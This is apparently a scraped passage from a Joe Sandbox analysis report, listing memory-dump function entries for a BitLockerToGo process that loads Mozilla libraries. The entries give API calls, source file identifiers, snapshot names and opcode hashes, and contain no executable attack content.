                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2988086103-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1a34f92c2ff6f98c87bbfc137142232f2222cf71ca3a43e110b10e4ecafb2777
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d8d0b7fa0fd10382be35d3f472cd50537223075c66ddfc409e2816c0b26b5ad1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a34f92c2ff6f98c87bbfc137142232f2222cf71ca3a43e110b10e4ecafb2777
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EE030767006189BCA10EFA8DC448867BACEE4D6B03150525E691C3700D231F905CBA1
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C9C85D3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C98CA10: malloc.MOZGLUE(?), ref: 6C98CA26
                                                                                                                                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C9C8725
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                                                                                                                                                                    • String ID: map/set<T> too long
                                                                                                                                                                                                                                                                                                                    • API String ID: 3720097785-1285458680
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 05d40cb6fec76d83108f0ed39942a52dc2d2b3430087c35b1b757bf1a28c273b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f4843c64989f5d5e909302d3e11f6ec5ef6ce76dab0ba23351473d26afaaa32f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05d40cb6fec76d83108f0ed39942a52dc2d2b3430087c35b1b757bf1a28c273b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F45166B4600645CFD705CF28C284A56BBF1BF5A318F19C28AD8595BB52C335E885CF97
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAE4D57
                                                                                                                                                                                                                                                                                                                    • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CAE4DE6
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ErrorR_snprintf
                                                                                                                                                                                                                                                                                                                    • String ID: %d.%d
                                                                                                                                                                                                                                                                                                                    • API String ID: 2298970422-3954714993
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a00dc45f3256bcfaa01c20661c51ebaadec4080f83db8e4750eaae7da99a7bf0
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0b1c819a232bf3217272c8b111179b5f4912d4419a6de26a6eb681fe894a0d57
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a00dc45f3256bcfaa01c20661c51ebaadec4080f83db8e4750eaae7da99a7bf0
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60310AB2E002586BEB109BA59C45BFF776CEF44308F050469ED159B781EB309949DBE2
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9B3D19
                                                                                                                                                                                                                                                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6C9B3D6C
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: _errnomozalloc_abort
                                                                                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                                                                                    • API String ID: 3471241338-2564639436
                                                                                                                                                                                                                                                                                                                    • Opcode ID: bdcdf4a654b886c5c9a61a944ebb7bfde1955628057c2ebd5ee2bd81b0f10ddf
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a2271f83391c3805bb7cba2ae0bf878566e68d6c6936135fafd217a90764d6d8
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdcdf4a654b886c5c9a61a944ebb7bfde1955628057c2ebd5ee2bd81b0f10ddf
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2111B236E08688E7DB00DB69CC144AEB775FFEA218B459219D859AB702EF30E584C390
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C9D6E22
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C9D6E3F
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C9D6E1D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footergetenv
                                                                                                                                                                                                                                                                                                                    • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                                                                                                                                                                    • API String ID: 1472356752-1153589363
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6452dd18ab6e82a6ee480d12290490ec7053b49ca780474b3001a6ea8eccb965
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e259f07353e5044d3d3bb14c73956ab4c572034c519b522b6abe50d176c04477
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6452dd18ab6e82a6ee480d12290490ec7053b49ca780474b3001a6ea8eccb965
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52F02471208649CBDB008BA8E990A8933B1536321CF254565C42487B51CF21F52BCBA3
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C9CB2C9,?,?,?,6C9CB127,?,?,?,?,?,?,?,?,?,6C9CAE52), ref: 6C9CB628
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9C90E0: free.MOZGLUE(?,00000000,?,?,6C9CDEDB), ref: 6C9C90FF
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9C90E0: free.MOZGLUE(?,00000000,?,?,6C9CDEDB), ref: 6C9C9108
                                                                                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C9CB2C9,?,?,?,6C9CB127,?,?,?,?,?,?,?,?,?,6C9CAE52), ref: 6C9CB67D
                                                                                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C9CB2C9,?,?,?,6C9CB127,?,?,?,?,?,?,?,?,?,6C9CAE52), ref: 6C9CB708
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C9CB127,?,?,?,?,?,?,?,?), ref: 6C9CB74D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a99cba624aa23e11421a594b2c25a6d6af553322001ab2a11b49aa6651d054e4
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e1a7bd45cb35c8c384f8b03b673c68abc028545a2cc2c2c74ac2e0334a486755
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a99cba624aa23e11421a594b2c25a6d6af553322001ab2a11b49aa6651d054e4
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6251DAB1B05216CBDB14CF18CA8076EB7B9FF84715F158529C85AABB00DB30E814CBA3
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C980A4D), ref: 6C9DB5EA
                                                                                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C980A4D), ref: 6C9DB623
                                                                                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C980A4D), ref: 6C9DB66C
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C980A4D), ref: 6C9DB67F
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: malloc$free
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1480856625-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1ae02e5b6075bfd882737c4352b83267c8f565b3b756450508b129e26bffe89f
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 65e63c9bff33695ab28bafec79a174d16df78b0aed50b107d96e46a6680fa990
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ae02e5b6075bfd882737c4352b83267c8f565b3b756450508b129e26bffe89f
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F31E571A006168FDF10CF58C84466AB7B9EF80324F5BC569E81AAB201DB31F915CBA0
                                                                                                                                                                                                                                                                                                                    APIs
Memory Dump Source
• Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Value$calloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3339632435-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C9AF611
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C9AF623
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C9AF652
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C9AF668
Memory Dump Source
• Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3510742995-0